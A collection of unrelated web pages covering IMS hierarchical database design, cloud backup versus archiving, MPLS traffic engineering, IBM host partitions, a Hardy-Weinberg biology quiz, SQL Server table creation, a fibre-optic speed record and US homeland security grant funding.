College ID, such as ARTS, ENGR, BUSADM, and FINEARTS.| |Dept||Information on each department within the college. It includes fields for the department ID (the key field), department name, chairman's name, number of faculty, and number of students registered in departmental courses.| |Course||Includes fields for the course number (the key field), course title, course description, and instructor's name.| |Enroll||A list of students enrolled in the course. There are fields for student ID (key field), student name, current grade, and number of absences.| |Staff||A list of staff members, including professors, instructors, teaching assistants, and clerical personnel. The key field is employee number. There are fields for name, address, phone number, office number, and work schedule.| |Student||Student information. It includes fields for student ID (key field), student name, address, major, and courses being taken currently.| |Billing||Billing and payment information. It includes fields for billing date (key field), semester, amount billed, amount paid, scholarship funds applied, and scholarship funds available.| |Academic||The key field is a combination of the year and the semester. Fields include grade point average per semester, cumulative GPA, and enough fields to list courses completed and grades per semester.| The process of data normalization helps you break data into naturally associated groupings that can be stored collectively in segments in a hierarchical database. In designing your database, break the individual data elements into groups based on the processing functions they will serve. At the same time, group data based on inherent relationships between data elements. For example, the College database (Figure 1-3) contains a segment called Student. Certain data is naturally associated with a student, such as student ID number, student name, address, and courses taken, Other data that we will want in our College database-such as a list of courses taught or administrative information on faculty members-would not work well in the Student segment. Two important data relationship concepts are one-to-many and many-to-many. In the College database, there are many departments for each college (Figure 1-3 shows only one example), but only one college for each department. Likewise, many courses are taught by each department, but a specific course (in this case) can be offered by only one department. The relationship between courses and students is one of many-to-many, as there are many students in any course and each student will take a number of courses. A one-to-many relationship is structured as a dependent relationship in a hierarchical database: the many are dependent upon the one. Without a department, there would be no courses taught: without a college, there would be no departments. Parent and child relationships are based solely on the relative positions of the segments in the hierarchy, and a segment can be a parent of other segments while serving as the child of a segment above it. In Figure 1-3, Enroll is a child of Course, and Course, although the parent of Enroll, is also the child of Dept. Billing and Academic are both children of Student, which is a child of College. (Technically, all of the segments except College are dependents.) When you have analyzed the data elements, grouped them into segments, selected a key field for each segment, and designed a database structure, you have completed most of your database design. You may find, however, that the design you have chosen does not work well for every application program. Some programs may need to access a segment by a field other than the one you have chosen as the key. Or another application may need to associate segments that are located in two different databases or hierarchies. IMS has provided two very useful tools that you can use to resolve these data requirements: secondary indexes and logical relationships. Secondary indexes let you create an index based on a field other than the root segment key field. That field can be used as if it were the key to access segments based on a data element other than the root key. Logical relationships let you relate segments in separate hierarchies and, in effect, create a hierarchic structure that does not actually exist in storage. The logical structure can be processed as if it physically exists, allowing you to create logical hierarchies without creating physical ones. We discuss both of these concepts in greater detail in Chapter 2, "IMS Structures and Functions." Because segments are accessed according to their sequence in the hierarchy, it is important to understand how the hierarchy is arranged. In IMS, segments are stored in a top-down, left-to-right sequence (see Figure 1-4). The sequence flows from the top to the bottom of the leftmost path or leg. When the bottom of that path is reached, the sequence continues at the top of the next leg to the right. Understanding the sequence of segments within a record is important to understanding movement and position within the hierarchy. Movement can be forward or backward and always follows the hierarchical sequence. Forward means from top to bottom, and backward means bottom to top. Position within the database means the current location at a specific segment. Hierarchical Data Paths In Figure 1-4, the numbers inside the segments show the hierarchy as a search path would follow it. The numbers to the left of each segment show the segment types as they would be numbered by type, not occurrence. That is, there may be any number of occurrences of segment type 04, but there will be only one type of segment 04. The segment type is referred to as the segment code. To retrieve a segment, count every occurrence of every segment type in the path and proceed through the hierarchy according to the rules of navigation: top to bottom front to back (counting twins) left to right For example, if an application program issues a GET-UNIQUE (GU) call for segment 6 in Figure 1-4, the current position in the hierarchy is immediately following segment 6 (not 06). If the program then issued a GET-NEXT (GN) call, IMS would return segment 7. As shown in Figure 1-4, the College database can be separated into four search paths: The first path includes segment types 01, 02, 03, and 04. The second path includes segment types 01, 02, and 05. The third path includes segment types 01, 06, and 07. The fourth path includes segment types 01, 06, and 08. The search path always starts at 01, the root segment. Figure 1-4: Sequence and data paths in a hierarchy. Whereas a database consists of one or more database records, a database record consists of one or more segments. In the College database, a record consists of the root segment College and its dependent segments. It is possible to define a database record as only a root segment. A database can contain only the record structure defined for it, and a database record can contain only the types of segments defined for it. The term record can also be used to refer to a data set record (or block), which is not the same thing as a database record. IMS uses standard data system management methods to store its databases in data sets. The smallest entity of a data set is also referred to as a record (or block). Two distinctions are important: A database record may be stored in several data set blocks. A block may contain several whole records or pieces of several records. In this article, we try to distinguish between database record and data set record where the meaning may be ambiguous. A segment is the smallest structure of the database in the sense that IMS cannot retrieve data in an amount less than a segment. Segments can be broken down into smaller increments called fields, which can be addressed individually by application programs. A database record can contain a maximum of 255 types of segments. The number of segment occurrences of any type is limited only by the amount of space you allocate for the database. Segment types can be of fixed length or variable length. You must define the size of each segment type. It is important to distinguish the difference between segment types and segment occurrences. Course is a type of segment defined in the DBD for the College database. There can be any number of occurrences for the Course segment type. Each occurrence of the Course segment type will be exactly as defined in the DBD. The only differences in occurrences of segment types is the data contained in them (and the length, if the segment is defined as variable length). Segments consist of two major parts, a prefix and the data being stored. (SHSAM and SHISAM database segments consist only of the data, and GSAM databases have no segments.) The prefix portion of a segment is used to store information that IMS uses in managing the database. Figure 1-5: Format of a variable-length segment. Figure 1-6 shows the format of a fixed length segment. In the fixed-length segment, there is no size field. Figure 1-6: Format of a fixed-length segment. The fields contained in an IMS database segment are described below. In the data portion, you can define the following types of fields: a sequence field, data fields. |Segment Code||IMS uses the segment code field to identify each segment type stored in a database. A unique identifier consisting of a number from 1 to 255 is assigned to each segment type when IMS loads the database. Segment types are numbered in ascending sequence, beginning with the root segment as 1 and continuing through all dependent segment types in hierarchic order.| |Delete Byte||IMS uses this byte to track the status of a deleted segment. The space it occupied may (or may not) be available for use.| Counters and Pointers This area exists in hierarchic direct access method (HDAM) and hierarchic indexed direct access method (HIDAM) databases and, in some cases, hierarchic indexed sequential access method (HISAM) databases. It can contain information on the following elements: Counters - Counter information is used when logical relationships are defined. Logical relationships are discussed in detail in "The Role of Logical Relationships" on page 2-55. Pointers - Pointers consist of one or more addresses of segments pointed to by this segment. Pointers are discussed in detail in "Pointer Types" on page 2-37. For variable-length segments, this field states the size of the segment, including the size field (2 bytes). Sequence (Key) Field The sequence field is often referred to as the key field. It can be used to keep occurrences of a segment type in sequence under a common parent, based on the data or value entered in this field. A key field can be defined in the root segment of a HISAM, HDAM, or HIDAM database to give an application program direct access to a specific root segment. A key field can be used in HISAM and HIDAM databases to allow database records to be retrieved sequentially. Key fields are used for logical relationships and secondary indexes. The key field not only can contain data but also can be used in special ways that help you organize your database. With the key field, you can keep occurrences of a segment type in some kind of key sequence, which you design. For instance, in our example database you might want to store the student records in ascending sequence, based on student ID number. To do this, you define the student ID field as a unique key field. IMS will store the records in ascending numerical order. You could also store them in alphabetical order by defining the name field as a unique key field. Three factors of key fields are important to remember: The data or value in the key field is called the key of the segment. The key field can be defined as unique or non-unique. You do not have to define a key field in every segment type You define data fields to contain the actual data being stored in the database. (Remember that the sequence field is a data field.) Data fields, including sequence fields, can be defined to IMS for use by applications programs. Field names are used in SSAs to qualify calls. See "Segment Search Argument" on page 3-22 for more information. In IMS, segments are defined by the order in which they occur and by their relationship with other segments: |Root segment||The first, or highest segment in the record. There can be only one root segment for each record. There can be many records in a database.| |Dependent segment||All segments in a database record except the root segment.| |Parent segment||A segment that has one or more dependent segments beneath it in the hierarchy.| |Child segment||A segment that is a dependent of another segment above it in the hierarchy.| |Twin segment||A segment occurrence that exists with one or more segments of the same type under a single parent.| IMS provides a Segment Edit/Compression Facility that lets you encode, edit, or compress the data portion of a segment in full-function or Fast Path DEDB databases. You can use the Edit/Compression Facility to perform the following tasks: encode data-make data unreadable to programs that do not have the edit routine to see it in decoded form edit data-allow an application program to receive data in a format or sequence other than that in which it is stored compress data-use various compression routines, such as removing blanks or repeating characters, to reduce the amount of DASD required to store the data The Segment Edit/Compression Facility allows two types of data compression: data compression-compression that does not change the content or relative position of the key field. For variable-length segments, the size field must be updated to show the length of the compressed segment. For segments defined to the application as fixed-length, a 2-byte field must be added at the beginning of the data portion by the compression routine to allow IMS to determine storage requirements. key compression-compression of data within a segment that can change the relative position, value, or length of the key field and any other fields except the size field. In the case of a variable-length segment, the segment size field must be updated by the compression routine to indicate the length of the compressed segment. IMS uses pointers to locate related segments in a database. Pointers are physically stored in the prefix portion of a segment. Each pointer contains the relative byte address (RBA) of another segment. When the database is loaded, IMS creates pointers according to the DBD you specified. During subsequent processing, IMS uses pointers to traverse the database (navigate from segment to segment). IMS automatically maintains the contents of pointers when segments are added, deleted, and updated.
<urn:uuid:accad744-b37e-4600-9312-1b6df5c37330>
CC-MAIN-2017-04
https://communities.bmc.com/docs/DOC-9908
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.913969
6,680
3.390625
3
By now, you’re probably using some form of cloud storage. People generally think about storing their current files in the cloud to access remotely or collaborate with others. Whether it’s Dropbox or Google Drive for personal use or logging into your company server for work, storing files remotely is becoming more commonplace everyday. However, storing older files in the cloud is also wise. Many enterprises use a form of cloud backup, or Backup as a Service in some cases. Others may need to archive old data for compliance standards or other reasons. The cloud can help these companies remain flexible as they store data, adding resources as necessary; as well as meet compliance, easily manage data, and avoid in-house expenditure. Cloud backup and cloud archiving are very similar—after all, they both store files in the cloud to access later if something goes awry—but they have several key differences. Similarities Between Archive and Backup Both cloud backup and cloud archiving are forms of cloud storage. Users and administrators can choose from individual files up to entire systems to keep in the cloud. The storage is generally reserved space in a data center with an attached virtual machine to run the related applications. It can be Pay As You Go or reserved (with PAYG, customers pay only for the resources they currently use on a month-to-month basis; with reserved, a certain amount of resources are set aside and must be paid for in advance). In both cases, files are stored in case they need to be accessed later; these are not files that are being used everyday. Both can take advantage of deduplication to ensure only newly modified data is transferred and stored, saving network use and storage space. And finally, both should include a variety of customization tools include scheduling file transfers. A simple way to define a backup is a constant transfer of files. Cloud backup software is usually designed to only copy files that have been updated, but they are transferred to the backup site at a constant rate, or set to backup at regular intervals. Backups may also keep different versions of the files in case of corruption. Backup plans generally include a plan for restoration with defined points in time, so companies can quickly restore systems or data if necessary. Because the initial transfer of data is immense, it can be performed by sending physical media to and from the data center. Essential files, databases and applications are usually backed up. This is data that must be accessed at any given moment. A cloud archive is basically just the initial transfer of data that happens from cloud backup, and not the incremental changes thereafter. Companies might archive older data they don’t expect to access frequently, like e-mails or old documents. These files will not change and can exist as a single archived copy. Generally they are not business critical files and the transfer speed is not as vital. Enterprises might turn to cloud archive solutions in order to free up valuable resources as files accumulate and drag down the system. Cloud archive and cloud backup are similar concepts and often use overlapping technologies. Although they differ largely in the execution and file type transferred, the terms are not interchangeable. Both uses, however, are vital for organizations with large amounts of data. Whether you need to archive large amounts of old data that you don’t anticipate accessing frequently, or want to backup critical files to restore in the case of emergency, the cloud offers a secure and flexible way to store information without expensive hardware provisioning. Posted By: Joe Kozlowicz
<urn:uuid:c552bad5-c799-4f35-b515-2ccfcb55eaef>
CC-MAIN-2017-04
https://www.greenhousedata.com/blog/cloud-archive-vs-cloud-backup
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280834.29/warc/CC-MAIN-20170116095120-00084-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951746
714
2.828125
3
MPLS (Multi-Protocol Label Switching) is the end result of the efforts to integrate Layer 3 switching (better known as routing) with Layer 2 WAN backbones (primarily ATM). Even though the IP+ATM paradigm is mostly gone today (owing to a drastic shift to IP-only networks in the last few years), MPLS retains a number of useful features from Layer 2 technologies -- most notably, the ability to send packets across the network through a virtual circuit (it's called Label Switched Path - LSP - in MPLS terminology). By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. NOTE: While the Layer 2 virtual circuits are almost always bidirectional (although the traffic contracts in each direction can be different), the LSPs are always unidirectional. If you need bidirectional connectivity between a pair of routers, you have to establish two LSPs. The LSPs in MPLS networks are usually established based on the contents of IP routing tables in core routers. However, there is nothing that would prevent LSPs being established and used through other means, provided that: - All the routers along the path agree on a common signalling protocol. - The router where the LSP starts (head-end router) and the router where the LSP ends (tail-end router) agree on what's travelling across the LSP. NOTE: The other routers along the LSP do not inspect the packets traversing the LSP and are thus oblivious to their content; they just need to understand the signalling protocol that is used to establish the LSP. With the necessary infrastructure in place, it was only a matter of time before someone would get the idea to use LSPs to implement MPLS-based traffic engineering -- and the first implementation in Cisco IOS closely followed the introduction of base MPLS (which at that time was called tag switching). The MPLS traffic engineering technology has evolved and matured significantly since then, but the concepts have not changed much since its introduction: - The network operator configures an MPLS traffic engineering path on the head-end router. (In Cisco's and Juniper's devices, the configuration mechanism involves a tunnel interface that represents the unidirectional MPLS TE LSP.) - The head-end router computes the best hop-by-hop path across the network, based on resource availability advertised by other routers. Extensions to link-state routing protocols (OSPF or IS-IS) are used to advertise resource availability. NOTE: The first MPLS TE implementations supported only static hop-by-hop definitions. These can still be used in situations where you need a very tight hop-by-hop control over the path the MPLS TE LSP will take or in networks using a routing protocol that does not have MPLS TE extensions. - The head-end router requests LSP establishment using a dedicated signalling protocol. As is often the case, two protocols were designed to provide the same functionality, with Cisco and Juniper implementing RSVP-TE (RSVP extensions for traffic engineering) and Nortel/Nokia favouring CR-LDP (constraint-based routing using label distribution protocol). - The routers along the path accept (or reject) the MPLS TE LSP establishment request and set up the necessary internal MPLS switching infrastructure. - When all the routers in the path accept the LSP signalling request, the MPLS TE LSP is operational. - The head-end router can use MPLS TE LSP to handle special data (initial implementations only supported static routing into MPLS traffic engineering tunnels) or seamlessly integrate the new path into the link-state routing protocol. The tight integration of MPLS traffic engineering with the IP routing protocols provides an important advantage over the traditional Layer 2 WAN networks. In the Layer 2 backbones, the operator had to establish all the virtual circuits across the backbone (using a network management platform or by configuring switched virtual circuits on edge devices), whereas the MPLS TE can automatically augment and enhance the mesh of LSPs already established based on network topology discovered by IP routing protocols. You can thus use MPLS traffic engineering as a short-term measure to relieve the temporary network congestion or as a network core optimisation tool without involving the edge routers. In recent years, MPLS traffic engineering technology (and its implementation) has grown well beyond features offered by traditional WAN networks. For example: - Fast reroute provides temporary bypass of network failure (be it link or node failure) comparable to SONET/SDH reroute capabilities. - Re-optimisation allows the head-end routers to utilise resources that became available after the LSP was established. - Make-before-break signalling enables the head-end router to provision the optimised LSP before tearing down the already established LSP. NOTE: Thanks to RSVP-TE functionality, the reservations on the path segments common to old and new LSP are not counted twice. - Automatic bandwidth adjustments measure the actual traffic sent across an MPLS TE LSP and adjust its reservations to match the actual usage. About the author: Ivan Pepelnjak, CCIE No. 1354, is a 25-year veteran of the networking industry. He has more than 10 years of experience in designing, installing, troubleshooting, and operating large service provider and enterprise WAN and LAN networks and is currently chief technology advisor at NIL Data Communications, focusing on advanced IP-based networks and web technologies. His books published by Cisco Press include and EIGRP Network Design. You can read his blog here: http://ioshints.blogspot.com/index.html
<urn:uuid:34094c22-5508-4c33-a43a-0a2ada8e0ab2>
CC-MAIN-2017-04
http://www.computerweekly.com/news/1280099496/MPLS-An-introduction-to-traffic-engineering
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00506-ip-10-171-10-70.ec2.internal.warc.gz
en
0.919965
1,191
3.265625
3
A Host partition owns some resource, very typically disk but also optical tape or network that it shares with a Guest also known as a Client partition. The Client then is using resources from the Host. In the case where it's Disk that's being shared the Host partition must be running before the Client partitions can be started. You could call the Host a 'primary' operating system I suppose and back in the AS/400 LPAR days that was the term we used. We don't any longer however because there can be multiple Host partitions on a single POWER Server while in the AS/400 and iSeries days that was not possible, it truly was Primary back then. Today some of the function of the Primary is taken over by the Flexible Service Processor (FSP) and the Hardware Management Console (HMC) or the IVM component of VIOS. The actual Host component is either IBM i or VIOS on POWER. - Larry "DrFranken" Bolhuis On 9/8/2012 5:28 PM, Nathan Andelin wrote: I'd like a clarification of terms. What is a host partition? What is a guest partition. If someone says "Currently it's one hosted and two guested LPARS", what does that mean? What is the difference between "hosted" and "guested"? Some references suggest that a "guest" runs under the primary operating system, such as Linux running under a Windows VM. Windows is the "host", while Linux is the "guest". If Windows fails to boot, then there would be no way to reach Linux, for example.
<urn:uuid:85902b49-4fb0-45e0-918d-448a079a66d4>
CC-MAIN-2017-04
http://archive.midrange.com/midrange-l/201209/msg00275.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00048-ip-10-171-10-70.ec2.internal.warc.gz
en
0.944293
345
3.1875
3
We often take for granted the technology we're currently using - computers, cell phones, tablets, etc., that we often forget there was a time when these devices didn't exist. Even making a telephone call was not as cut-and-dry as it is today - before computers took away most of these functions, people needed telephone operators to help connect calls and provide directory assistance. The AT&T Archives channel on YouTube has posted a 17-minute video showcasing a film from 1969, entitled "Operator", which showcases the lives of telephone operators from the late '60s. Several things fascinate me from this era. First, the mechanical nature of connecting calls back then. No computers or monitors are seen - and operators had to look up phone numbers via old-fashioned directories (when was the last time you used your phone book?). Second, I'm fascinated with the headsets these operators were using - many of today's Bluetooth headsets and voice headsets likely originated from these original designs. Finally, it's interesting to view customers' frustrations and attitudes with the operators (a funny moment is someone calling the operator to find out whether it was 6 a.m. or 6 p.m.). If you are interested at all about the history of technology, this video is worth 17 minutes of your time. Keith Shaw rounds up the best in geek video in his ITworld.tv blog. Follow Keith on Twitter at @shawkeith. For the latest IT news, analysis and how-tos, follow ITworld on Twitter, Facebook, and Google+. Watch some more cool videos: Current video game characters battle old-school 8-bit rivals Nokia admits faking phone video Watch a robot turn into a car without Michael Bay's assistance Sherlock Holmes is really good at Blue's Clues Watch this preview of Lego Star Wars: The Empire Strikes Out
<urn:uuid:b70b998d-e3b9-4da9-b86a-9c17697e9666>
CC-MAIN-2017-04
http://www.itworld.com/article/2718773/consumerization/visit-a-time-when-humans-needed-help-making-phone-calls.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281332.92/warc/CC-MAIN-20170116095121-00102-ip-10-171-10-70.ec2.internal.warc.gz
en
0.953896
376
2.8125
3
What email address or phone number would you like to use to sign in to Docs.com? If you already have an account that you use with Office or other Microsoft services, enter it here. Or sign in with: Signing in allows you to download and like content, which the author will be aware of. Embed code for: F16Chap21 Select a size Natural Selection, genetic drift, and gene flow In your own words, describe the difference between Genetic Variation and Evolution Differences in genotypes found in a population. Changes of a population over time. The following: natural selection, genetic drift, and gene flow are all methods for what? *Only natural selection causes adaptive evolution is the change in allele frequencies in a population over generations can lead to Evolution on a larger scale VITAL for evolution can be measured at a molecular level Sources: mutation, gene duplication, and sexual reproduction There was a specific population of rabbits. They only contained the genes that expressed a brown coat. One rabbit was accidently exposed to radiation. The rabbit mated with another brown rabbit. One white baby was produced. What agent of evolutionary change is this? None of the above Rates generally low Other evolutionary processes usually more important in changing allele frequency Ultimate source of genetic variation Makes evolution possible Duplication of Genes Chromosomal rearrangements that lead to an expanded genome Example: sense of smell Rate of reproduction correlates with mutation rates Sexual reproduction shuffles alleles through: What is the point of this equation? Helps one to predict genotype frequencies! p2 + 2pq + q2 = 1 p + q = 1 Hardy-Weinberg Equilibrium occurs if what conditions are met? No mutation takes place No genes are transferred to or from other sources (no immigration or emigration takes place) Random mating is occurring The population size is very large No selection occurs What part of this equation refers to heterozygous frequency? None of it Which of the following sets of alleles frequencies would produce the greatest proportions of heterozygotes? P=.5; q= .2 P=.5; q= .5 P=.8; q= .2 Can’t be determined What is the frequency of homozygous recessive if you were given the following information? P=.9 and Q= .1 If all assumptions of the Hardy-Weinberg equilibrium were met, what would happen to the frequency of the recessive allele after many generations? Remain the same Would decrease slowly Would increase exponentially Would not be passed on after many generations due to it being bred out. Which of the following equations refer to an allelic frequency? Homozygous Dominant genotype frequency= 0.55 What is the frequency of homozygous recessive genotype? p + q = 1 p2 + 2pq + q2 = 1 I need help In a population of red (dominant) or white flowers in Hardy-Weinberg equilibrium, the frequency of red flowers is 91%. What is the frequency of the red allele? p + q = 1 p2 + 2pq + q2 = 1 Red short-horned cattle are homozygous for the red allele, white cattle are homozygous for the white allele, and roan cattle are heterozygotes. Population A consists of 36% red, 16% white, and 48% roan cattle. What are the allele frequencies? red = 0.36, white = 0.16 red = 0.6, white = 0.4 red = 0.84, white = 0.16 red = 0.5, white = 0.5 Allele frequencies cannot be determined unless the population is in equilibrium. If, on average, 46% of the loci in a species' gene pool are heterozygous, then the average homozygosity of the species should be There is not enough information to say unless the population is in equilibrium. Mamma turtle is a green sea turtle and laid eggs in the sand next to the shore. The season had unexpected high tides, and washed into the nest. The eggs were washed up onto a nearby island shore. The nearby island shore only had loggerhead sea turtles. Many years later tourists were drawn to this island to see a rare species of green loggerhead sea turtles. What evolutionary agent was this? Movement of alleles from one population to another Animal physically moves into new population Drifting of gametes or immature stages into an area Mating of individuals from adjacent populations Darwin is studying his favorite animal, finches! He is specifically monitoring one population whose diets consist of only red berries. This population currently has genetic variation of blue feathers and gold feathers. One season the island experiences a terrible drought. The berries are very scarce. Half of the finch population dies off. Coincidently, all of the blue feathered finches died off except for one. Generations later, Darwin is unable to observe any blue finches What is this evolutionary agent? In small populations, allele frequency may change by chance alone Magnitude of genetic drift is negatively related to population size Genetic drift can lead to the loss of alleles in isolated populations Alleles that initially are uncommon are particularly vulnerable Sometimes one or a few individuals leave a population and “find” their own isolated area. Cause drastic changes in allelic frequency, some may disappear or a rare one may increase. Josie’s cat, Mittens, had a $*&?% ton of kittens. The kittens had a hard time with surviving, however. Birds would swoop up the kittens leaving behind nothing but tufts of cute kitten fur, or the raccoons would kill off the kittens because that was competition for their cat food. Only a few kittens survived out of 20 or so. These kittens were of brown coloring, and blended in the fields well. They were also larger, and stronger than their deceased siblings. These kittens then bred and led to population of cats that were all large and brown. What is this an example of? Some individuals leave behind more progeny than others, and the rate at which they do so is affected by phenotype and behavior 3 conditions for natural selection to occur and to result in evolutionary change: Variation must exist among individuals in a population Variation among individuals must result in differences in the number of offspring surviving in the next generation Variation must be genetically inheritedp2 + 2pq + q2 = 1
<urn:uuid:331b0679-2cdf-4ead-876a-897ee553efb4>
CC-MAIN-2017-04
https://docs.com/josie-ausdemore/4203/f16chap21
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00038-ip-10-171-10-70.ec2.internal.warc.gz
en
0.924458
1,401
3.515625
4
By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Mitsubishi Electric Corporation has succeeded in sending data at 1.3 terabits per second down a fibre-optic cable 8,400 kilometres in length. While the speed does not represent an overall speed record, it is a record for the distance, which is equivalent to that from Tokyo to Southern California, the path that fibre-optic cables between Japan and the US often run. The achievement could be replicated by operators across the world, including those that transport data and voice calls between UK and US companies. Getting more data to travel along a fibre-optic cable is extremely important for the cable operators. The high cost of laying undersea cables and keeping them in working order adds to the price telecommunication carriers pay to use the cables. If more data can be sent along a single fibre, the construction and running costs can be shared between more customers and the price to each customer can be reduced. One of the standard technologies employed commercially on such cables is dense wavelength division multiplexing (DWDM), a system that allows multiple beams of light to travel along the fibre at the same time without interfering with each other. Researchers at Mitsubishi Electric used DWDM to group 65 signals together, each giving data speeds of 20 gigabits per second bps. This initiative achieved the total speed of 1.3 terabits per second. To be able to send the data over the distance tested the engineers worked to refine the amplifiers used in the system, said Takashi Mizuochi, manager of the lightwave transmission team at Mitsubishi Electric's research centre in Kanagawa outside Tokyo. At intervals along the route of the fibre, amplifiers must be placed to boost the light signal and clean up any interference with the signal. First, the team improved the amplifiers to produce a stronger light beam that can travel up to 75 kilometres without the need for amplification. Current systems can only manage gaps of around 45 kilometres before an amplifier station is needed, said Mizuochi. Secondly, the team expanded the bandwidth of the amplifiers so that they would be able to handle more channels. The new amplifiers have a 36-nanometer bandwidth compared to a 30-nanometer bandwidth on normal amplifiers, thus allowing around 10 more channels to be carried down the fibre. With the 8,400-kilometre barrier broken, Mizuochi is turning his attention to longer distances. "Now we are trying to expand the distance to 9,000 kilometres," he said. Why this distance? A transpacific fibre cable often runs in a ring with different paths being taken by the northern and southern halves of the ring. The northern half covers a distance of 9,000 kilometres, he said. Mitsubishi Electric plans to disclose more details about the transmission system during a presentation at the Optical Fibre Communication Conference scheduled to be held in Anaheim, California, on 20 March.
<urn:uuid:a385aa23-4411-45b1-857b-646f0cb9f3a7>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240044250/Mitsubishi-breaks-long-distance-Terabits-record
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00340-ip-10-171-10-70.ec2.internal.warc.gz
en
0.927043
632
2.75
3
In a relational database, tables are at the focal point of activity. Tables store all of your data and serve as the essential interface to any applications or client interactions. In this article, you will get good ideas about how to make your own tables. After you decide how you need your tables to be organized, SQL Server offers numerous settings that you can use to change the conduct of these tables and their columns. SQL Server does an extraordinary job of securing your data. But you can go the additional mile by exploiting a database idea known as “requirements.” In this level, we quickly demonstrate to you industry standards that offer imperatives to expand the security of your information. Perspectives are another helpful database capacity, so we will look at how to make them by utilizing the SQL Server Management Studio. Conclusively, in light of the fact that nobody likes to enter code by hand, SQL Server offers supportive scripting capacities that permit you to mechanize normal database support assignments, for example, making new tables. You’ll see how to create scripts rapidly at whatever point you have to make or keep up a table. How to Build New Tables Using SQL Server Management Studio. To start, you will need to launch the SQL Server Management Studio by following these steps:\ - Open the SQL Server Management Studio. - Connect to the suitable SQL server instance. - Expand the connection’s entry in the Object Explorer view. - Expand the Databases folder. - Right-click the Tables folder and choose New Table. See the diagram below: After right-clicking the table as indicated in the diagram, create your table as described in the following steps: Enter a unique name for each column in your table. After you’ve done this naming, the base portion of the dialog box contains numerous configurable settings for this section, as shown in the figure below. Let us look extensively at each of these settings. In the drop-down box, pick one of the data type shown. Pick from the full list of data types found in Microsoft SQL Server: Bigint, Binary, Bit, Char, Datetime, Decimal, Float, Int, etc. Allow the column to permit NULL values (optional). You can mark the Allow Nulls check box. Set properties for these columns. Properties can be set either alphabetically or categorically. Below is a list of what these properties are and how they can be used. Allow Nulls: This decides whether a section can store NULL (that is, non-existent) values. Specific types of columns, for example, primary keys, are not allowed to hold NULL values. Collation: SQL Server stores information from several languages, settings can be set as default for the server, database, and column (for example, English, Dutch, etc). SQL Server can use a specialized set of rules for these languages. This setting can be enabled at the database or server level. Computed Column Specification: In SQL server, you can specify computational rules that can be executed at runtime, as shown in the figure below. The above diagram shows a table name dbo.Accounts where only Column with Name Allows Null value as ticked. Note that other tables were blocked for security reasons. Formulas can be provided when defining columns and we can also enable Is Persisted by setting it from “No” to “Yes.” This instructs the SQL server to store it in the database. When you are finished entering your columns, make sure you save your work by clicking on the save icon at the top left corner of your workspace, as highlighted in yellow below. The above illustration can also be created using standard T-SQL. The basic syntax for creating a table in MSSQL 2008 is stated below: CREATE TABLE table_name( column1 datatype, column2 datatype, column3 datatype, ..... columnN datatype, PRIMARY KEY( one or more columns ) ); Using the example above with dbo.Accounts table already created, we have: CREATE TABLE [dbo].[Accounts]( [AccountId] [dbo].[vtmKey] IDENTITY(1,1) NOT FOR REPLICATION NOT NULL, [Name] [dbo].[vtmName] NULL, [AccountTypeId] [dbo].[vtmKey] NOT NULL, [AccountStatusId] [dbo].[vtmKey] NOT NULL, [PartnerId] [dbo].[vtmKey] NOT NULL, [Balance] [dbo].[vtmMoney] NOT NULL, [BalanceSuspended] [dbo].[vtmMoney] NOT NULL, [LastBatchBalance] [dbo].[vtmMoney] NOT NULL, [DateAmmended] [dbo].[vtmDate] NOT NULL, [bonusCurrent] [dbo].[vtmMoney] NOT NULL, [bonusPrevious] [dbo].[vtmMoney] NOT NULL, [BonusCumulative] [dbo].[vtmMoney] NOT NULL, [PPASQuota] [dbo].[vtmMoney] NOT NULL, [Threshold] [dbo].[vtmMoney] NOT NULL, CONSTRAINT [PK_Accounts] PRIMARY KEY CLUSTERED ( [AccountId] ASC )WITH (PAD_INDEX = OFF, STATISTICS_NORECOMPUTE = OFF, IGNORE_DUP_KEY = OFF, ALLOW_ROW_LOCKS = ON, ALLOW_PAGE_LOCKS = ON) ON [PRIMARY] ) ON [PRIMARY]
<urn:uuid:1702684f-cdca-46e7-9b87-1c344866b24c>
CC-MAIN-2017-04
http://resources.intenseschool.com/level-1-beginners-guide-to-creating-new-tables-in-sql-server-2008-how-to-build-new-tables/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280319.10/warc/CC-MAIN-20170116095120-00066-ip-10-171-10-70.ec2.internal.warc.gz
en
0.82401
1,208
2.765625
3
Since the U.S. Department of Homeland Security's (DHS) inception in 2003 to protect the United States from terrorist attacks, Congress and the DHS have overseen a funding formula for each state and congressional district, as well as for designated high-risk cities. State and local governments were once given federal funds based on a formula of population and broad categories of risk assessment. The formulas have varied generally according to credible threat, presence of critical infrastructure, vulnerability and population density In January 2006, the process changed significantly, and disbursements are directly tied to need and risk assessment. Now officials at all levels face much stiffer competition for homeland security dollars, and must present specific risk assessments, strategies and budget breakdowns. This year's grant assessment requires analysis of threat and vulnerability, and the extent of mutual aid cooperation. Governments seeking grants must explain allocation on strategic priorities such as IT for homeland security preparedness and the expected results. This change in procurement has short- and long-term implications for IT initiatives that support homeland security around the nation. Washington Pays Attention IT and cyber-security at the state level now get more attention from Washington, D.C. than in past years. There is greater focus on the possibility that breaks in cyber- security can affect key industries and financial security. IT security solutions, firewalls and intrusion systems are increasingly seen as crucial to disaster preparedness, emergency management and prevention of more mundane cyber-attacks that, in the right combination, could knock a city out cold. Improved technology to remove the lags in communication when one system goes down is becoming a top priority countrywide. In a short period of time, all levels of government have had to adjust their approach to risk management. "Officials may be inclined to treat cyber-related risks as an afterthought, or not at all," noted John A. McCarthy, director of the Critical Infrastructure Protection Program at the George Mason University School of Law. "When measured against a dirty bomb, for example, senior managers have a hard time entertaining discussion on cyber-issues. But we learned during Katrina that communications and situational 